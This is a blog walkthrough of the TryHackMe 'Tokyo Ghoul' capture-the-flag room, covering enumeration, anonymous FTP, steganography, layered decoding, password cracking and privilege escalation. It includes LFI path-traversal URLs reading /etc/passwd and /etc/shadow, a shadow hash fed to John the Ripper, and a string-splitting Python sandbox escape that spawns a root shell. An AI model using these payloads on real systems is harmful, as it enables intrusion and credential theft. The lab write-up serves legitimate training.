# Challenge: Tokyo Ghoul (TryHackMe)

## **Introduction**

### Tokyo Ghoul CTF Challenge - A Complete Walkthrough

This write-up documents my journey through the "Tokyo Ghoul" room on TryHackMe, a beginner-to-intermediate level capture-the-flag challenge inspired by the popular anime series. This room combines multiple penetration testing techniques, including network enumeration, steganography, cryptographic decoding, local file inclusion (LFI) exploitation, and Python sandbox escape for privilege escalation.

**Warning:** This write-up contains spoilers for Tokyo Ghoul seasons 1 and 2. If you plan to watch the anime, consider bookmarking this and returning after you've finished the series.

**Skills Covered:**

* Network reconnaissance with Nmap
    
* Web directory enumeration with Gobuster
    
* Anonymous FTP exploitation
    
* Steganography with Steghide
    
* Binary analysis with rabin2
    
* Multi-layer encoding/decoding (Morse, Hex, Base64)
    
* Local File Inclusion (LFI) vulnerabilities
    
* Password cracking with John the Ripper
    
* Python jail/sandbox escape techniques
    
* Linux privilege escalation
    

**Tools Used:**

* Nmap, Gobuster, FTP client
    
* Steghide, exiftool, rabin2
    
* CyberChef for decoding
    
* John the Ripper
    
* GTFOBins for privilege escalation research
    

Let's dive into the challenge and explore how each technique connects to ultimately achieve root access on the target machine.

## About the room

![](https://assets.tryhackme.com/additional/imgur/tuzTqo4.gif align="left")

wzebi dyalmn????

This room took a lot of inspiration from psychobreak , and it is based on Tokyo Ghoul anime.

Alert: This room can contain some spoilers 'only s1 and s2 ' so if you are interested to watch the anime, wait till you finish the anime and come back to do the room 

The machine will take some time, just go grab some water or make a coffee.

## Where am i ?

![](https://assets.tryhackme.com/additional/tokyoghoul/DecisiveLeadingDuck-small.gif align="left")

Let's do some scanning. 

### Answer the questions below

1. Use nmap to scan all ports   
      
    `nmap -sV IP_Address`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768464785290/40a108af-a8c4-444f-a6ed-a4eac42e941b.png align="center")
    
2. How many ports are open ?  `3`
    
3. What is the OS used ? `ubuntu`
    

## Planning to escape

![](https://assets.tryhackme.com/additional/tokyoghoul/bc5df8c79950e46f820fad03bcb98e056b03adc8_hq.jpg align="left")

Try to look around any thing would be useful . 

### Answer the questions below

1. Did you find the note that the others ghouls gave you? where did you find it? `jasonroom.html`  
      
    site: `IP_Address`, then navigate to the present link
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768465362390/5cbb03af-f9f2-466a-976f-ca5ca603edd3.png align="center")
    
2. What is the key for Rize executable? `kamishiro`  
      
    `ftp` was one of the open ports: we’ll try to check if we can find some files using `ftp`  
      
    `ftp 10.49.171.206`  
    
    Name (10.49.171.206:root): `Anonymous`  
    
    ftp&gt; `cd "need_Help?"`  
    
    ftp&gt; `ls -la`  
    
    ftp&gt; `get Aogiri_tree.txt`  
    
    ftp&gt; `cd Talk_with_me`  
    
    ftp&gt; `ls -la`  
    
    ftp&gt; `get rize_and_kaneki.jpg`  
    
    ftp&gt; `get need_to_talk`  
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768465466265/edf1600b-2cbc-4fe7-977f-c30f28f27ff8.png align="center")
    
    `cat Aogiri_tree.txt`
    
    ```bash
    Why are you so late?? i've been waiting for too long .
    So i heard you need help to defeat Jason , so i'll help you to do it and i know you are wondering how i will. 
    I knew Rize San more than anyone and she is a part of you, right?
    That mean you got her kagune , so you should activate her Kagune and to do that you should get all control to your body , i'll help you to know Rise san more and get her kagune , and don't forget you are now a part of the Aogiri tree .
    Bye Kaneki.
    ```
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768465731959/dfd96531-c4b9-4903-8228-1f69a8289a07.png align="center")
    
    `exiftool rize_and_kaneki.jpg`
    
      
    `steghide extract -sf rize_and_kaneki.jpg`  
      
    `cat need_to_talk`
    
    ```bash
    ELF>\ufffd@\ufffd<@8
              @@@@h\ufffd\ufffd\ufffd--   88\ufffd-\ufffd=\ufffd=\ufffd\ufffd\ufffd-\ufffd=\ufffd=\ufffd\ufffd\ufffd\ufffdDDP\ufffdtdP!P!P!\\Q\ufffdtdR\ufffdtd\ufffd-\ufffd=\ufffd=/lib64/ld-linux-x86-64.so.2GNU\ufffd\ufffdUY\ufffd\u01dd\ufffdH\ufffd\ufffd<2\ufffd^\ufffd\\ufffdGNU\ufffd\ufffd(\ufffd\ufffde\ufffdmgUal\ufffd !LZ\ufffd /\ufffd 76(\ufffd="\ufffdputsputcharstdinprintffgetsstrlenstdoutmallocusleep__cxa_finalizesetbufstrcmp__libc_start_mainfreelibc.so.6GLIBC_2.2.5_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTablequ\ufffdi	{\ufffd\ufffd\ufffd\ufffdx@ \ufffd \ufffd@ \ufffd\ufffd \ufffd?\ufffd\ufffd?
    \ufffd?\ufffd@\ufffd@@ @(@0@8@@@H@	P@
    X@
      `@h@H\ufffdH\ufffd\ufffd/H\ufffd\ufffdt\ufffd\ufffdH\ufffd\ufffd\ufffd5\ufffd/\ufffd%\ufffd/@\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffd\ufffd\ufffd\ufffd\ufffd%\ufffd/h\ufffdp\ufffd\ufffd\ufffd\ufffd%\ufffd/\ufffd`\ufffd\ufffd\ufffd\ufffd%\ufffd/h	\ufffdP\ufffd\ufffd\ufffd\ufffd%\ufffd/h
    \ufffdH\ufffd=\ufffd\ufffd\ufffd.\ufffdDH\ufffd=\ufffd/H\ufffdz/H9\ufffdtH\ufffd\ufffd.H\ufffd\ufffdt	\ufffd\ufffd\ufffd\ufffd\ufffdH\ufffd=Q/H\ufffd5J/H)\ufffdH\ufffd\ufffdH\ufffd\ufffd?H\ufffd\ufffdH\ufffdH\ufffd\ufffdtH\ufffdu.H\ufffd\ufffd\ufffd\ufffdfD\ufffd\ufffd\ufffd=1/u/UH\ufffd=V.H\ufffd\ufffdt
            H\ufffd=\ufffd.\ufffd-\ufffd\ufffd\ufffd\ufffdh\ufffd\ufffd\ufffd\ufffd	/]\ufffd\ufffd\ufffd\ufffd\ufffd{\ufffd\ufffd\ufffdUH\ufffd\ufffd\ufffdJ\ufffd\ufffd\ufffd\ufffd\ufffdtH\ufffd=\ufffd\ufffd\ufffd\ufffd_\ufffd\ufffdH\ufffd=\ufffd\ufffdxH\ufffd=\ufffdl\ufffd]\ufffdUH\ufffd\ufffdH\ufffd\ufffdH\ufffdt.\ufffdH\ufffd\ufffd\ufffd'\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffdE\ufffd\ufffd$\ufffdE\ufffdH\ufffdH\ufffd\ufffdH\ufffd#.H\ufffdH\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffdE\ufffd;E\ufffd|\u053f\ufffd1\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdUH\ufffd\ufffdH\ufffd\ufffd H\ufffd}\ufffd\ufffdE\ufffd\ufffd*\ufffdE\ufffdHc\ufffdH\ufffdE\ufffdH\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdP\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdE\ufffd\ufffdE\ufffdHc\ufffdH\ufffdE\ufffdH\ufffd\ufffd\ufffd\ufffdu\ufffdL\ufffd\ufffdL\ufffd\ufffdD\ufffd\ufffdA\ufffd\ufffdH\ufffd\ufffdH9\ufffdu\ufffdH\ufffd[]A\A]A^A_\ufffd\ufffdH\ufffdH\ufffd\ufffdkamishiroHey Kaneki finnaly you want to talk 
    Unfortunately before I can give you the kagune you need to give me the paraphrase
    Do you have what I'm looking for?
    
    P\ufffdGood job. I believe this is what you came for:
    Hmm. I don't think this is what I was looking for.
    Take a look inside of me. rabin2 -z
    > \
    \ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdx\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdB\ufffd\ufffd\ufffd(\ufffd\ufffd\ufffd\ufffdH\ufffd\ufffd\ufffdhp\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdzRx
                                                      \ufffd\ufffd\ufffd+zRx
                                                            $ \ufffd\ufffd\ufffd\ufffdFJ
    S                                                               \ufffd?\ufffd;*3$"D\ufffd\ufffd\ufffd\\ufffd\ufffd\ufffd\ufffdXA\ufffdC
    `\ufffd\ufffd\ufffd\ufffdeA\ufffdC
    R\ufffd\ufffd\ufffdWA\ufffdC
    xI\ufffd\ufffd\ufffd}A\ufffdC
    H\ufffd\ufffd\ufffd\ufffdMA\ufffdC
    D\ufffd\ufffd\ufffd\ufffd\ufffd]B\ufffdI\ufffdE \ufffdE(\ufffdD0\ufffdH8\ufffdG@j8A0A(B BBD\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdq
    $\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd8
    \ufffd
     P	\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdo\ufffd\ufffd\ufffd\ufffdo\ufffd\ufffd\ufffdo\ufffd\ufffd\ufffd\ufffdo\ufffd=6FVfv\ufffd\ufffd\ufffd\ufffd\ufffd\ufffdx  @ \ufffd GCC: (Debian 9.3.0-15) 9.3.0\ufffd\ufffd8\ufffd	
    h
    
    \ufffd\ufffd$ P!\ufffd!\ufffd=\ufffd=\ufffd=\ufffd?@p@\ufffd@\ufffd\ufffd\ufffd
                             P!\ufffd7\ufffd@F\ufffd=m\ufffdy\ufffd=\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd4#\ufffd\ufffd\ufffd\ufffd=\ufffd\ufffd=\ufffd\ufffd=\ufffdP!\ufffd@\ufffd
    
                                                                     -eN j\ufffd0 p@~\ufffd \ufffd\ufffd\ufffd\ufffd\ufffd@$\ufffd\ufffd\ufffd\ufffd\ufffdW\ufffdp@;O ^x@k z\ufffd]\ufffd\ufffd\ufffd@4\ufffd+\ufffd\ufffd@\ufffd\ufffdX\ufffd\ufffd@\ufffd\ufffd}\ufffdfM\ufffd\ufffd@\ufffd !\ufffd"\ufffd crtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.7452__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entryneed_to_talk.c__FRAME_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_finifree@@GLIBC_2.2.5putchar@@GLIBC_2.2.5print_intro_ITM_deregisterTMCloneTablestdout@@GLIBC_2.2.5sleep_delayputs@@GLIBC_2.2.5stdin@@GLIBC_2.2.5_edatastrlen@@GLIBC_2.2.5setbuf@@GLIBC_2.2.5printf@@GLIBC_2.2.5slow_type__libc_start_main@@GLIBC_2.2.5fgets@@GLIBC_2.2.5__data_startstrcmp@@GLIBC_2.2.5__gmon_start____dso_handle_IO_stdin_used__libc_csu_initmalloc@@GLIBC_2.2.5__bss_startmaindialogscheck_passwordprint_flag__TMC_END___ITM_registerTMCloneTable__cxa_finalize@@GLIBC_2.2.5the_passwordusleep@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.got.plt.data.bss.comment\ufffd#\ufffd\ufffd$6\ufffd\ufffd D\ufffd\ufffdNo
                              88V\ufffd^\ufffd\ufffd\ufffdo\ufffd\ufffd&k\ufffd\ufffd\ufffdo\ufffd\ufffdz\ufffdB\ufffd\ufffd  \ufffd\ufffd\ufffd\ufffd1\ufffd$$	\ufffd  \ufffdP!P!\\ufffd\ufffd!\ufffd!\ufffd\ufffd\ufffd\ufffd\ufffd\ufffd=\ufffd-\ufffd\ufffd?\ufffd\ufffd@\ufffdp@p08\ufffd@\ufffd0 \ufffd0\ufffd0\ufffd0\ufffd-       \ufffd84\ufffd;
    ```
    
    `chmod +x need_to_talk`  
      
    `./need_to_talk`  
      
    `rabin2 -z need_to_talk`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768466048310/a721c5ef-5ef5-4624-afab-261467a7844f.png align="center")
    
3. Use a tool to get the other note from Rize.
    

## What Rize is trying to say?

![](https://fc08.deviantart.net/fs70/f/2014/347/d/5/jason_torturing_kaneki_by_otakubishounen-d89o67a.gif align="left")

You should help me , i can't support pain aghhhhhhh

### Answer the questions below

1. What the message mean did you understand it ? what it says? `d1r3c70ry_center`  
      
    we tried using Steghide on our images but we didn’t have a passphrase we’ll use the one we found on `need_to_talk`  
      
    `chmod +x need_to_talk`  
      
    `./need_to_talk`  
      
    (kamishiro)  
      
    `steghide extract -sf rize_and_kaneki.jpg`  
      
    (You\_found\_1t)  
      
    `cat yougotme.txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768466929135/6d29bcbb-e1e3-4d16-92ac-33179221f8f1.png align="center")
    
    From `Morse Code` → From `Hex` (space) → From `Base64`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467072385/3bd71f59-47e5-460a-a221-211747a10b79.png align="center")
    
2. Can you see the weakness in the dark ? no ? just search 
    
3. What did you find something ? crack it
    
4. What is rize username? `kamishiro`  
      
    on `need_to_talk` file there’s a place where the name is mentioned  
    
5. What is rize password? `password123`  
      
    The hint shows that we should use John to help us find the password, but so far, we only have the username, and we don’t have the hash, so our next goal is to try to find the hash to use John to find the password  
      
    `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`  
      
    I tried using John with SSH, but it takes so long, so we need the option that uses a hash  
      
      
    `gobuster dir -u http://<TARGET_IP>/d1r3c70ry_center -w /usr/share/wordlists/dirb/common.txt -x php,html,txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467268330/9ab169e4-e20b-4384-b83c-553de4e8ae81.png align="center")
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467298669/5e15ec16-3fb0-4acb-be35-1c292fe307b1.png align="center")
    
    I tried to check the claim directory for any interesting files or directories and found the about-us.html and contact-us.html, which didn’t contain much but were good for our reconnaissance.  
      
    `gobuster dir -u http://IP_Address/d1r3c70ry_center/claim -w /usr/share/wordlists/dirb/common.txt -x php,html,txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467326465/8095b7a9-31d9-4de2-97ef-4257675ae8b6.png align="center")
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467341115/623d36bc-eb20-4872-beb4-292bd0678742.png align="center")
    
      
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467354249/66c58d83-576e-4080-afef-0376faa25bd1.png align="center")
    

going back to the site (`http://IP_Address/d1r3c70ry_center/claim/index.php`) and noticed that there’s an index.php file, but on the developer tools or inspector, we notice that there’s an LFI Vulnerability indicated by this `index.php?view=flower.gif`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467600926/2e4c3929-20e2-4329-a6d8-8556f467f4a0.png align="center")

Trying to navigate to `http://IP_Address/d1r3c70ry_center/claim/index.php?view=../../../../etc/passwd` or `http://IP_Address/d1r3c70ry_center/claim/index.php?view=../../../../etc/shadow` but wasn’t succeed, it’s keen  

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467846883/d293f119-2a88-4610-92af-08bc1fb7d1af.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467917298/8c141646-5fb3-4fe4-a3b4-a14c899418b6.png align="center")

Went to CyberChef to URL-encode the `http://IP_Address/d1r3c70ry_center/claim/index.php?view=../../../../etc/passwd` to check if this can pass on the LFI vulnerability

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467902850/a0135413-2af1-44a4-857e-3fba73455a70.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768467950622/c7537ea1-d9a6-456b-a38c-3222a4c1cf13.png align="center")

`echo 'kamishiro:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0' > hash.txt`

`john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`  
  
`password123 (kamishiro)`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768468522750/b9cfea50-c7f2-4c9d-beaa-4600194619e2.png align="center")

## Fight Jason

![](https://33.media.tumblr.com/cd0d4d963a4ef3564d7ca4621d3346f0/tumblr_nj23o9WFXq1u9f7vko1_500.gif align="left")

Finnaly i got Rize kagune help me fight Jason and get root .

### Answer the questions below

1. user.txt  
      
    since we now have the username and the password we’ll login using ssh inorder to access the user flag  
      
    `ssh kamishiro@IP_Address`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768468614633/7a56c5b5-dcd8-4cdd-b5c9-ef47afcc739c.png align="center")
    
    `pwd`
    
    `ls -la`
    
    `cat user.txt`
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768468641178/3dd84219-f680-4e45-a5c7-4444a204762f.png align="center")
    
2. root.txt  
      
    most of the time getting to root privilege escalation can be a challenge but the first step is to check `sudo -l` which attimes might not be an option
    
    ![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768468742069/861219ea-e268-4a3f-8b66-646cf5bc0f65.png align="center")
    
    ```bash
    sudo -l
    [sudo] password for kamishiro: 
    Matching Defaults entries for kamishiro on vagrant.vm:
        env_reset, exempt_group=sudo, mail_badpass,
        secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    
    User kamishiro may run the following commands on vagrant.vm:
        (ALL) /usr/bin/python3 /home/kamishiro/jail.py
    ```
    
    tried checking the jail.py code with the help of Claude code and ChatGPT to figure out how we can achieve the privilege escalation  
      
    `cat jail.py`
    

```python
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
    print("Hi! Welcome to my world kaneki")
    print("========================================================================")
    print("What ? You gonna stand like a chicken ? fight me Kaneki")
    text = input('>>> ')
    for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
        if keyword in text:
            print("Do you think i will let you do this ??????")
            return;
    else:
        exec(text)
        print('No Kaneki you are so dead')
if __name__ == "__main__":
    main()
```

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768469367780/170e0864-8edd-48c2-b968-e40b1a1a3d2e.png align="center")

`sudo /usr/bin/python3 /home/kamishiro/jail.py`  
  
tried passing different text or code snippet but it didn’t work at first  
  
`import('os').system('/bin/bash')`  
  
`import('pty').spawn('/bin/bash')`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768469353667/23bf015d-57de-41d7-970d-2f95b1b6a4e3.png align="center")

```python
How the Bypass Works:
The Filter:
pythonfor keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
    if keyword in text:
The filter checks if ANY of these exact substrings appear in your input. So 'os', 'import', and 'system' would be caught.

The Bypass - Step by Step:
1. getattr(__builtins__, "__im" + "port__")
What it does: Accesses the __import__ function from __builtins__
Why it works:

Instead of typing __import__ directly (which contains the substring 'import')
We split it: "__im" + "port__" → The filter sees "__im" and "port__" separately
At runtime, Python concatenates them → "__import__"
getattr(__builtins__, "__import__") → Gets the import function

Without bypass: __import__ → blocked ❌
With bypass: "__im" + "port__" → not blocked ✅

2. ("o" + "s")
What it does: Imports the os module
Why it works:

Instead of 'os' as a single string (which would be caught)
We split it: "o" + "s" → Filter sees "o" and "s" separately
At runtime: "o" + "s" = "os"

Without bypass: import os → blocked ❌
With bypass: "o" + "s" → not blocked ✅

3. .__dict__["sy" + "stem"]
What it does: Accesses the system function from the os module
Why it works:

.__dict__ gives us all attributes/functions of the os module as a dictionary
Instead of os.system (contains 'system')
We use dictionary access: ["sy" + "stem"]
Filter sees "sy" and "stem" separately
At runtime: "sy" + "stem" = "system"

Without bypass: os.system → blocked ❌
With bypass: ["sy" + "stem"] → not blocked ✅

4. ("/bin/bash")
Just calls the system function with /bin/bash to spawn a root shell!

Visual Summary:
python# What we want:
__import__('os').system('/bin/bash')

# What gets blocked:
'import', 'os', 'system'

# How we hide it:
getattr(__builtins__, "__im" + "port__")("o" + "s").__dict__["sy" + "stem"]("/bin/bash")
                       ^^^^^^^^^^^^^^^^   ^^^^^^^              ^^^^^^^^^^^^
                       splits 'import'    splits 'os'          splits 'system'

Key Concept:
The filter does static analysis (checks the string before execution), but we use dynamic string concatenation (strings combine at runtime). By the time Python executes the code, the strings are already concatenated, but the filter never saw the blocked keywords!
```

  
`sudo /usr/bin/python3 /home/kamishiro/`[`jail.py`](http://jail.py)

```python
getattr(__builtins__, "__im" + "port__")("o" + "s").__dict__["sy" + "stem"]("/bin/bash")
```

\&gt; &gt; &gt; getattr(**builtins**, "**im" + "port**")("o" + "s").\_**dict\_\[**"sy" + "stem"\](“/bin/bash”)

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768471362156/e2416e5f-d421-4545-8fbf-88ad3b90cce5.png align="center")

`find / -type f -name root.txt 2>/dev/null`

`cat /root/root.txt`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1768471432076/57d616b5-133f-46c1-8301-45ac4b32dbbd.png align="center")

## Special thanks

![](https://giffiles.alphacoders.com/132/13246.gif align="left")

You can contact me on my [discord :  0U](%22/bin/bash%22)R4N05#6231

Congratulations you've complete Tokyo ghoul room 1. This is the first room I've ever created so If you enjoyed it please give me a follow up on [t](https://twitter.com/0_n05)[witter and](https://twitter.com/0_n05) send me your feedback  in twitter or discor[d , and](https://twitter.com/0_n05) i'll be so grateful if you like this room and share it with your friends , thank you .

## **CONCLUSION**

### Final Thoughts and Key Takeaways

Congratulations! We've successfully completed the Tokyo Ghoul CTF room by progressing through multiple stages of exploitation:

**Attack Chain Summary:**

1. **Initial Reconnaissance** → Discovered 3 open ports (FTP, SSH, HTTP)
    
2. **FTP Enumeration** → Found anonymous access leading to steganography clues
    
3. **Steganography & Encoding** → Extracted hidden messages through multiple encoding layers
    
4. **Web Exploitation** → Identified and exploited LFI vulnerability to read `/etc/shadow`
    
5. **Password Cracking** → Used John the Ripper to crack kamishiro's password hash
    
6. **Initial Access** → SSH login as kamishiro user
    
7. **Privilege Escalation** → Bypassed Python jail sandbox to achieve root access
    

**Key Learning Points:**

1. **Layered Security Doesn't Mean Secure** - Multiple encoding layers (Morse → Hex → Base64) can be defeated with systematic decoding
    
2. **String Obfuscation Bypasses Filters** - The Python jail escape demonstrated how runtime string concatenation defeats static keyword filtering
    
3. **LFI + Password Cracking = Initial Access** - Combining web vulnerabilities with offline password cracking is highly effective
    
4. **Always Check** `sudo -l` - Privilege escalation often starts with understanding what you're allowed to run as root
    
5. **GTFOBins is Essential** - Knowing where to look for exploitation techniques saves time
    

**What Made This Challenge Great:**

* **Thematic Consistency** - The Tokyo Ghoul theme was well-integrated throughout
    
* **Realistic Technique Chaining** - Each stage built upon the previous, mimicking real-world penetration testing
    
* **Educational Value** - Covered fundamental techniques that appear in many real-world scenarios
    
* **Progressive Difficulty** - Started simple and gradually increased complexity
    

**Special Thanks:** Huge appreciation to the room creator (0UR4N05#6231) for crafting this engaging challenge. This was their first room creation, and it's an excellent contribution to the TryHackMe community.

If you enjoyed this writeup, feel free to share it with others learning penetration testing. Remember: the best way to learn is by doing - so fire up your own instance and give it a try!

**Happy Hacking! 🎯🔓**
